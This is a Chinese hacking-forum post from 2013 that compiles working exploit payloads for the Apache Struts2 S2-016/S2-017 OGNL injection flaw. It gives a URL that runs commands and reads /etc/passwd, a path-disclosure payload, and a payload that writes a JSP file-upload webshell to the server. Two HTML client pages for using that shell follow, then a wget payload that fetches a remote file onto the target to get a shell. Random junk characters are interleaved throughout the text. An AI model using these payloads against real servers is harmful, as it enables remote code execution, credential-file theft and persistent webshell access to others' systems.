找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Struts2 S2-016/S2-017漏洞执行代码
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2971|回复: 0
打印 上一主题 下一主题

Struts2 S2-016/S2-017漏洞执行代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-18 23:03:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
9 d9 ^1 C) M% c' A
0 E6 l  n+ p/ n3 M# T9 L% f喜欢就点一下感谢吧^_^
, C4 t$ G6 @+ i6 S$ J: ~3 i+ \4 S# u$ o! N
带回显命令执行:# |( w& B0 ]/ o  G+ X/ k

$ L% M: w# S( B& Ihttp://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}; N! {8 G" Y% u! b
3 F6 K; s# V' y# L8 Y# m+ C
, g& S. Z* v% V0 {1 n* i

3 i- B" i  q3 Y( r5 h! o# a  v3 S  f

+ ~: Q* i, h% e1 C8 J) d; Z
3 L" v7 x0 r* d; [2 g0 L# r4 c! n1 O* m' C9 Y
爆路径:- o0 J+ F/ I# E% C; U

( m5 A3 }5 J1 R1 Rhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D
5 E; B5 R2 q" `! H8 L  H7 v
- u1 z8 S% }  J$ f3 R
0 I; v0 x- e6 m& r% @0 C) b3 H( v0 l7 L
# x. `& }2 }! `: o% n+ Z# X

2 }  Q% j* ^8 |4 H2 h6 C* }9 A写文件:! Z+ M8 F  `6 y6 s0 Y
8 N3 i( f+ [( p  T# p" I7 b
http://www.example.com/struts2-blank/example/X.action?redirect:${
4 l0 s. E0 W5 L3 n, a, X5 q0 o" o: ]
3 E3 `1 p( s# L6 x% ]! O. L6 X%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')," l4 _( y+ ^1 E& ^

  M3 D' `! t3 V+ R- _* `%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/")," R. u" m$ ]$ Q8 v* o% {
( x; v/ h8 D6 }9 F: K
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close(); `. t- E' i  k5 r3 d, ~6 Y

8 Z! C4 o$ Y9 d5 E' Y}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
3 Y  p/ f" G1 R; t# c, Y
9 I9 ]5 K/ V2 U
3 j7 V' k. t% y  L8 ?9 j+ u1 ^  k6 a* [% g
写入的文件内容:
" x- f5 F/ Q& l3 q
1 ^& ]( V4 G9 j. H- O/ E<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
2 E3 `+ V/ N2 t( j0 a3 w% R, j% B6 ^; q; W3 O! u
其实就是一个jsp的小马,需要客户端配合                                                                                  . }% l2 A- e$ F% A. x8 D

" @1 t$ l1 f' I. w! s% v% b函数f是文件名,t是内容0 o% K- g; w+ Y0 g1 c

7 K" U( W* w# L% m* C( W客户端:
; {; c0 c2 k7 Z) R* y: a, D0 ^9 r- q
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">% Z- ?. g$ N3 d& f# Y; ~* E+ L6 n

; x" E4 d' x: }- A  I<textarea name=t cols=120 rows=10 width=45>your code</textarea>
; I' v' Y. A3 |6 ~
1 {0 r3 I0 ?. p<center>
: R: K$ k, s, {0 {* C) B1 ]6 C) o
/ h" o/ h; b6 Z. G) ?
6 w9 [  b; U! w/ q% S- F1 J6 Q5 m
! }  p) s8 j1 f9 j; ~% J; B  W<input type=submit value="提交">
2 F6 @6 k6 A# M8 H; N
, v- s5 M( t3 A$ G8 S' G</form>
$ y) f0 d3 w. t& e3 V" e& w& P% Y( Y& V
7 z5 J& ~7 [% }0 {就在当前目录建立一个fjp.jsp+ R" Z9 e6 A+ o0 }2 O* M' B: B  C, R
$ {3 B( C1 X+ ~) v8 Y9 w
shell:http://www.example.com/struts2-blank/example/fjp.jsp
# e4 V9 V' i9 b& A! G9 d* h* F- {1 V! N) F7 i) \3 K

- C0 e8 W6 b& f# n$ V, P2 a  d1 @2 t+ v, A9 I% T8 b! K
还有@园长的一个客户端:
- N+ l# k) A8 @
/ y; y  k! x$ W! X<html>
0 O  L( v  d8 y+ _
! Q7 W$ o' o+ s) n. x<head>/ ]/ R/ o( s4 K6 y
) S  c* Q3 V/ [% s4 m% w. m- S
<meta http-equiv="content-type" content="text/html;charset=utf-8"># Z' `5 Q9 r5 l: G, O

* [1 N0 l- p2 c  L7 h7 @# o2 D2 L" q<title>jsp-园长</title>1 W. V0 G7 g0 v
% ?" _! c# U0 G% V( Z
</head>6 ?) F1 n/ V( _, ?; Y7 A$ Y
: {% m* A, L; x
<style>& E" |! |8 P, D" {. |: N

' U9 F" x1 J: J) F2 O1 A0 T.main{width:980px;height:600px;margin:0 auto;}
$ N' o+ @0 j7 s' e" N2 L3 \4 ^
* C- c" ?4 t+ o# ]5 K9 ?, D; E.url{width:300px;}) ~, y6 E6 u: R& M# W

: m  ], @5 \% c. M0 {( l$ g' P.fn{width:60px;}4 u& f) Y9 y3 f

8 r5 `, y( x8 u- g3 o  N9 s. _.content{width:80%;height:60%;}& a# W- |) \5 k( X0 X+ y

  {6 Y3 e' ]: K' o</style>+ P; [, [/ j1 T8 n  t

/ J- I( k: X- [2 V; J) J) t<script>
4 B# ^) ^7 G1 |- m- I; m, w
8 L, c, g8 R. E5 N  function upload(){
  G& S0 K8 s% Q' @
6 `# p0 n8 [: p( ?6 I    var url = document.getElementById('url').value,  j  E7 n2 S% y! @. w

+ k/ H$ |) w' S% i      content = document.getElementById('content').value,* h: r% i- F: U( _

4 ?" {% X  e$ N      fileName = document.getElementById('fn').value,  e- z4 S$ L4 S

6 ^; k7 Y* Q5 r) F& ^* i! g# [* u      form = document.getElementById('fm');. K2 j2 `0 m9 \; f& j0 e

# x6 A% ^! z' l    if(url.length == 0){
7 \- p6 z) [- e% q+ r( I8 U0 z, R4 m2 n
      alert("Url not allowd empty!");
, I' n8 u( X9 Y& ~2 @6 l% K# b# G9 b' g3 z
      return ;
* a8 E+ Q/ ?: C$ w6 C5 t( T+ j& E3 w
    }5 q0 S# N# o5 g
9 \: w# e9 t- U/ |' Q  Q; M
    if(content.length == 0){
1 _  b  I/ x& A0 H( ?& j/ x( l, t  J. i0 J
      alert("Content not allowd empty!");/ w, o9 p, ^( N4 n
4 P4 |" S- V( L. I
      return ;
! H3 ]4 H% M+ o3 z: y4 p( V5 R; s; Z
    }$ M! V" w' v5 O3 E. ]( `1 X

0 i- \! [7 F5 _; W    if(fileName.length == 0){4 D5 {8 {1 a, t* U3 S' y3 i
1 d. f4 g: v) O
      alert("FileName not allowd empty!");9 }5 t. w( c2 p9 |, t

4 D6 ]- c. N  ^      return ;
0 E; J( j* |/ A* p9 i* [5 ?1 h3 U* q: ?7 E
    }8 {6 W: o; p% w6 z- P* G

1 I2 q, ?) q' E3 u3 V+ K( _, }$ Q# ^    form.action = url;
% H. H4 a& c) U# [! d* ^9 a: c- b( O- x/ A; G
    form.submit();
+ v$ f  {8 M# a2 a: B$ U2 K
* {: U8 O9 d1 r9 F8 l1 ?% r8 e9 K  }$ R5 Z# k6 p3 X; a0 Y, u, J

, O5 ^' |+ P% {: k</script>
) \# O7 U1 y4 c: [# Q* {1 M, Q' w" [9 I+ V" h9 g
<body>7 i0 Z/ i/ R2 @! \, y& H

. d) ?# I& i0 `- g8 V; _) k: g3 S- |  b<div class="main">
+ b( T* \7 c6 v) n
" D, D- q1 n9 W& A; W- D  <form id="fm" method="post">  
; C2 z( ?& s) V6 Z3 \% F1 Q8 B' R+ Z- `# D6 K
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
$ x5 P4 J" \9 r* E3 N
% U9 P4 d9 i' x    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  / R+ s, c+ [: X+ ^( Q0 g( p. F

) `' f& w7 l% E$ n& ?6 v    <a href="javascript:upload();">Upload</a>
- ~* ~, C5 ~5 ~2 Q. F+ H! t6 Y  C+ d( V  u) P) s* }
! a" ]% }/ E- A% e: O
; q4 N9 f9 ?. E9 U$ c) y
    <textarea id="content" class="content" name="t" ></textarea>8 h$ V: }" X: Q' p* l$ z% A3 s

, i8 @# e  B% F/ B" V% v8 o( `! o, ^  </form>
7 Z( k0 O) B8 n) _7 [% |1 r3 K/ E2 C1 }4 J1 h, P. G
</div>
  U! r2 D! R/ A7 w0 Z5 h# @
4 Y: h* \; W5 v- n3 T/ {1 j</body>& E; z" W* _% F

" C; l' o2 {+ O, p8 c3 A</html>
( q5 [7 Q3 r, j9 P, ~, A* \
) G" e( R5 ~$ K/ c) D4 ?- C. q' g
) K! K) t0 P4 ?3 _' o9 U2 @: v9 V$ r- D- I3 \. p0 A
还有@X发的一个wget的getshell
( T% |% P% L: ^  w: u' q! g! J3 J; |- I& ^
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
9 U3 z  z) p3 @, f( p: D9 d
; z0 ~: B  \6 S! z( [! A4 F)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}: w  y; A9 U* I
复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表